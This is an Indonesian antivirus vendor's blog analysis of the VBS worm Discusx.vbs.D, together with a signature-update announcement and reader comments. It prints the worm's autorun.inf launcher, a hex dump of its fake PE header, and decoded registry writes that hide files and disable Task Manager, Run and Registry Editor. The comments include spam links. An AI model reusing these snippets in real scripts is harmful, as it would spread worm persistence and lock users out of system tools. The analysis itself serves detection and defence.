Home > Analisa Virus, Antivirus, Update PCMAV > Discusx.vbs.D: Fake Ramnit Say Met Lebaran

Discusx.vbs.D: Fake Ramnit Say Met Lebaran

Discusx.vbs.D. Sampel varian Discusx.vbs terakhir kali di kirimkan sekitar tahun 2009. Worm yang dibuat menggunakan bahasa pemrograman Visual Basic Script ini tidak jauh berbeda dengan beberapa worm VBS lainnya. Namun variant Discusx.vbs yang satu ini akan mengingatkan kita pada virus Ramnit yang banyak menyebar di Indonesia.

A. Info File
Nama Malware : Discusx.vbs.D
Asal : Indonesia
Ukuran File : 14.6 KB (14,952 bytes)
Packer : ~
Pemrograman : Visual Basic Script
Icon : VBS File
Tipe : Worm

B. About Malware

Jika melihat gambar di atas, mengingatkan kita pada virus Ramnit yang menginfeksi file dengan ekstensi exe, dll, htm dan html. Discusx adalah malware tipe worm yang tidak menginfeksi file lain seperti halnya Ramnit, meski pada varian yang baru ini, terdapat beberapa payload yang mirip dengan Virus Ramnit seperti:
1. Membuat file shortcut pada setiap local drive:
• Copy of Shortcut to (1).lnk
• Copy of Shortcut to (2).lnk
• Copy of Shortcut to (3).lnk
• Copy of Shortcut to (4).lnk

2. Membuat file autorun.inf dan folder RECYLER pada Local Drive.
3. Membuat file dengan nama Watermark.exe pada folder M1crosoft di Program Files.

Seluruh tubuhnya di-encode menggunakan ScrEnc (Script Encoder)seperti yang digunakan oleh virus Alice yang menginfeksi file htm dan html serta menyembunyikan file doc/docx. Untuk mengelabui user, pada bagian awal code ditambahkan string yang seolah menunjukan bahwa worm Discusx adalah merupakan file PE seperti yang terlihat source code berikut ini.

00000000   FF FE 27 00 4D 00 5A 00  90 00 2E 00 2E 00 2E 00   ÿþ'.M.Z........
00000016   2E 00 2E 00 2E 00 2E 00  2E 00 2E 00 FF 00 FF 00   ............ÿ.ÿ.
00000032   2E 00 2E 00 0D 00 0A 00  27 00 B8 00 2E 00 2E 00   ........'.¸.....
00000048   2E 00 2E 00 2E 00 2E 00  2E 00 40 00 2E 00 2E 00   ..........@.....
00000064   2E 00 2E 00 2E 00 2E 00  2E 00 2E 00 2E 00 2E 00   ................
00000080   2E 00 2E 00 2E 00 2E 00  2E 00 2E 00 2E 00 2E 00   ................
00000096   2E 00 2E 00 2E 00 2E 00  2E 00 2E 00 2E 00 2E 00   ................
00000112   2E 00 2E 00 2E 00 2E 00  2E 00 2E 00 2E 00 2E 00   ................
00000128   2E 00 B8 00 2E 00 2E 00  2E 00 2E 00 2E 00 BA 00   ..¸...........º.
00000144   2E 00 2E 00 B4 00 2E 00  CD 00 21 00 B8 00 2E 00   ....´...Í.!.¸...
00000160   4C 00 CD 00 21 00 54 00  68 00 69 00 73 00 20 00   L.Í.!.T.h.i.s. .
00000176   70 00 72 00 6F 00 67 00  72 00 61 00 6D 00 20 00   p.r.o.g.r.a.m. .
00000192   63 00 61 00 6E 00 6E 00  6F 00 74 00 20 00 62 00   c.a.n.n.o.t. .b.
00000208   65 00 20 00 72 00 75 00  6E 00 20 00 69 00 6E 00   e. .r.u.n. .i.n.
00000224   20 00 44 00 4F 00 53 00  20 00 6D 00 6F 00 64 00    .D.O.S. .m.o.d.
00000240   65 00 2E 00 2E 00 2E 00  2E 00 24 00 2E 00 2E 00   e.........$.....
00000256   2E 00 2E 00 2E 00 2E 00  2E 00 0D 00 0A 00 27 00   ..............'.
00000272   20 00 8F 00 60 01 F9 00  DB 00 CB 00 EB 00 14 20    ..`.ù.Û.Ë.ë..
00000288   C6 02 CB 00 EB 00 14 20  C6 02 CB 00 EB 00 14 20   Æ.Ë.ë.. Æ.Ë.ë..
00000304   C6 02 0D 00 0A 00 27 00  20 00 20 00 48 00 F7 00   Æ.....'. . .H.÷.
00000320   22 21 C6 02 CA 00 EB 00  14 20 C6 02 A2 00 F4 00   "!Æ.Ê.ë.. Æ.¢.ô.
00000336   7E 01 C6 02 CA 00 EB 00  14 20 C6 02 0D 00 0A 00   ~.Æ.Ê.ë.. Æ.....
00000352   27 00 22 00 F4 00 61 01  C6 02 CA 00 EB 00 14 20   '.".ô.a.Æ.Ê.ë..
00000368   C6 02 52 00 69 00 63 00  68 00 CB 00 EB 00 14 20   Æ.R.i.c.h.Ë.ë..
00000384   C6 02 0D 00 0A 00 27 00  20 00 20 00 2E 00 2E 00   Æ.....'. . .....

C. Companion/File yang dibuat
Seperti yang sudah dijelaskan sebelumnya, companion yang dibuat worm Discusx.vbs.D ini sama seperti yang dibuat Ramnit meskipun sebenarnya hanyalah tipuan agar user menganggap worm ini adalah Ramnit. Perbedaan yang paling mendasar dan sangat terlihat adalah pada autorun.inf yang dibuat. Karena pada autorun.inf buatan Ramnit, source codenya terdapat karakter acak. Sedangkan pada autorun.inf buatan Discusx.vbs.D tidak terdapat karakter aneh dan justru diperjelas dengan penanda bahwa file autorun.inf tersebut adalah companion dari worm Discusx.vbs.D.

; Discus-X
[autorun]
ShellExecute = WScript.exe RECYCLER\S-l-5-2l-796845957-4l3027322-l80l67453l-l003\INF02.dat

Contoh lain pada file desktop.ini

; Lets Discus-X : )
[.ShellClassInfo]
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=31

D. Hasil Infeksi
Beberapa utility Windows tidak bisa digunakan, seperti Run Command, Taks Manager, Search dan Registry Editor seperti yang terlihat pada penggalan script yang sudah di decode berikut ini.

wss.regWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", ".::Let's Discus-X::."
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "2", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "0", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "0", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
wss.Regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
wss.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Discus-X"

PCMAV 8.1 Update Build2

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 8.1 Update Build2 telah hadir dengan penambahan 16 pengenal varian virus baru. Bagi Anda pengguna PCMAV 8.1, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada menu Setup – Updater. Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik tombol “Check for Updates” pada menu Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui link ini:

SendSpace.com

Letakkan file hasil download tersebut (vx1.sig) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah vx1.sig, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 8.1 Update Build2:
Cacingan
Cacingan.inf
Discusx.vbs.D
Discusx.vbs.D.htm
Discusx.vbs.D.inf
Discusx.vbs.D.ini
Discusx.vbs.D.lnk.A
Discusx.vbs.D.lnk.B
LockScreen.C
LockScreen.C.bat
LockScreen.D
LockScreen.E
LockScreen.F
LockScreen.G
LockScreen.H
LockScreen.I

Categories: Analisa Virus, Antivirus, Update PCMAV Tags:
  1. rahman
    August 27th, 2012 at 18:06 | #1

    Udah update build 2 nih,

  2. August 29th, 2012 at 11:51 | #2

    Aduh ane di blokir pas mau masuk ke postingan ini. Nih SS nya –>> http://i1136.photobucket.com/albums/n482/nidusmays/blokir.png Untuk sementara ane matiin aja proteksinya.. hehe..
    Kalo boleh tau kenapa yah??? Ane pake AVG Antivirus

  3. PC Ranger
    August 29th, 2012 at 19:25 | #3

    @Syamsudin :
    False alarm bro. Biasalah yg kayak-kayak gitu. AVG versi berapa?

  4. kernel
    August 29th, 2012 at 20:10 | #4

    @PC Ranger
    sᴏk tau bgt ente kalo itu false alarm ahahahaha

    @Syamsudin
    coba ente liat lagi artikel dari tim PCMAV di atas, mengandung sebagian code virus tsb kan ?
    itulah alasan AVG Online Shield ente memblokir halaman ini, karena halaman ini mengandung malicious code.

    AVG ente sudah berjalan sebagai mana mestinya, bukan “false alarm” seperti yang dikatakan PC Ranger secara yakin namun tanpa didasari pengetahuan apa2 ahahaha

  5. August 30th, 2012 at 07:22 | #5

    @PC Ranger
    versi 2012

    @Kernel
    OOooo gara2 itu toh, tengkyu sob infonya..

  6. AnanyButBoync
    August 31st, 2012 at 16:55 | #6

    ZVXZADFGASDGADFHGAD QWERZSDGASDADSFHGADFS
    QWERADFGASDGXZCBZX ADFHGZSDGASDASDFHGAD
    ASFDSDGSADDSFGHADS ERYERSDGSADASDFHGAD
    ASFDSDGSADSDAFHSAD YUKYSDGSADSDFH

  7. September 3rd, 2012 at 21:55 | #7

    online drugstore http://loveshow.org/user/Skymnannomoz/ cheap pills

  8. anix
    September 4th, 2012 at 07:00 | #8

    Kapan Majalah PC Media 9/2012 terbit

  9. KodokDay
    September 4th, 2012 at 23:00 | #9

    kepada pihak PCMEDIA, bikin antivirus jgn ribet2 knp juga jgn berat aplikasinya kan gw punya laptop sering not responding. klo gak ditanggapi, beneran nih gw pindah ke ubuntu!

  10. AtasAneBegoSejakDariKandungan
    September 5th, 2012 at 00:46 | #10

    sumpah atas ane bego setengah mampus ^
    apa hubungannya PCMAV sering not responding sama pindah Ubuntu ?
    kalo menurut ente PCMAV ga stabil ya udah ga usah dipake gitu kok repot pake ngancam pindah Ubuntu segala go bego

  11. KodokDay
    September 5th, 2012 at 14:46 | #11

    @AAB : lo kali yg bego, emg salah klo gw pake PCMAV? masalah gw kan cuma sering not responding aja, kenapa lo yg repot. drpd gw pake anvir luar yg ukurannya gede mending pake buatan lokal. rencana emg iya mo pindah, di windows gak pake anvir virusnya byk pake anvir not respnding mulu!

  12. Ardyn
    September 5th, 2012 at 17:51 | #12

    Mana majalah 9/2012 chief, koq belum terbit??

  13. Rogan
    September 5th, 2012 at 21:08 | #13

    Saya mau nanya……
    RTP PCMAV udah bisa di 64 bit atau belum?? Tolong dijawab…… makasih sebelumnya

  14. PC Ranger
    September 6th, 2012 at 14:46 | #14

    @Rogan :
    Kalo dari file Readme.TXT-nya sih, tim PCMAV hanya merekomendasikan scanner untuk windows x64.

  15. Roger
    September 6th, 2012 at 18:15 | #15

    Kenapa telat lagi terbit majalah 9/2012 dari bulan sebelumnya??

  16. Robin
    September 11th, 2012 at 04:59 | #16

    Websitenya kembali sepi lagi ya, kapan update lagi? dan kapan majalah 9/2012 terbit, biasanya sblum tgl 10.

  17. PC Ranger
    September 12th, 2012 at 00:49 | #17

    @Robin :
    Biasalah bro, beberapa situs plus forum [anti]virus yang ane jabanin, belom ada yang serame situs porno hehehe. Abis, buat bikin virus (yg canggih) aza dah sebegitu susahnya palagi bikin antivirus, tambah puyeng tuh programmernya.

  18. cupen
    September 14th, 2012 at 05:52 | #18

    Lama menuggu PC Media 9/2012 keluar, ada apa tuch Chief?? Update kek infonya.

  19. September 14th, 2012 at 11:41 | #19

    Thanks for sharing such a useful stuff!